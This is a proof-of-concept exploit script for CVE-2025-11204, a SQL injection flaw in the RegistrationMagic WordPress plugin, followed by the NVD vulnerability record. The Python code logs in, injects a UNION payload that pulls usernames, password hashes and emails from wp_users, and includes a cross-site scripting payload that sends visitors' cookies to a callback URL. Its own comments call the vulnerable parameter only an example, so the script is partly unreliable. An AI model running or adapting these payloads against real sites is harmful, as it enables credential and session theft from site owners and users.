CVE-2025-11204

# CVE-2025-11204 - RegistrationMagic SQL Injection PoC # Vulnerability Location: class_rm_reports_service.php (Reports Service) # Affected Versions: <= 6.0.6.2 import requests import re from urllib.parse import urljoin class RegistrationMagicSQLi: def __init__(self, target_url, admin_user, admin_pass): self.target_url = target_url.rstrip('/') self.session = requests.Session() self.admin_user = admin_user self.admin_pass = admin_pass self.cookies = {} def login(self): """Step 1: Authenticate as WordPress administrator""" login_url = urljoin(self.target_url, '/wp-login.php') data = { 'log': self.admin_user, 'pwd': self.admin_pass, 'wp-submit': 'Log In', 'redirect_to': urljoin(self.target_url, '/wp-admin/'), 'testcookie': '1' } self.session.get(login_url) # Get cookies first resp = self.session.post(login_url, data=data, allow_redirects=True) if 'wordpress_logged_in' in str(self.session.cookies): print("[+] Login successful") return True return False def exploit_sqli(self, payload): """Step 2: Inject SQL payload into vulnerable parameter""" # The vulnerable endpoint is in the reports service exploit_url = urljoin(self.target_url, '/wp-admin/admin.php?page=rm_reports') params = { 'rm_filter': payload # Example vulnerable parameter } headers = { 'User-Agent': 'Mozilla/5.0 (compatible; RegistrationMagic-Exploit)' } resp = self.session.get(exploit_url, params=params, headers=headers) return resp.text def extract_passwords(self): """Step 3: Extract admin password hashes via UNION-based SQLi""" # Example UNION-based payload to extract user credentials # Note: Actual column count must be determined first payload = "1' UNION SELECT user_login, user_pass, user_email FROM wp_users-- -" result = self.exploit_sqli(payload) # Extract password hashes from response hashes = re.findall(r'\$P\$[A-Za-z0-9./]{53}', result) return hashes def xss_via_user_agent(self, callback_url): """Step 4: Unauthenticated XSS via User-Agent header""" # Craft XSS payload for form submission User-Agent xss_payload = f'<script>fetch("{callback_url}?cookie="+document.cookie)</script>' form_url = urljoin(self.target_url, '/?rm_form_submit=1') headers = { 'User-Agent': xss_payload } resp = requests.get(form_url, headers=headers) return resp.status_code # Usage example: # exploit = RegistrationMagicSQLi('http://target-wordpress-site.com', 'admin', 'password123') # if exploit.login(): # passwords = exploit.extract_passwords() # print(f"Extracted hashes: {passwords}")

{"cve": {"id": "CVE-2025-11204", "sourceIdentifier": "[email protected]", "published": "2025-10-08T05:15:31.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 6.0.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. An unauthenticated attacker could utilize an injected Cross-Site Scripting via user-agent on form submission to leverage this to achieve Reflected Cross-Site Scripting."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/services/class_rm_reports_service.php?rev=3360241", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3374106/custom-registration-form-builder-with-submission-manager/trunk?contextall=1&old=3366909&old_path=%2Fcustom-registration-form-builder-with-submission-manager%2Ftrunk", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4532cb38-453b-460c-879d-6f0e1caacafc?source=cve", "source": "[email protected]"}]}}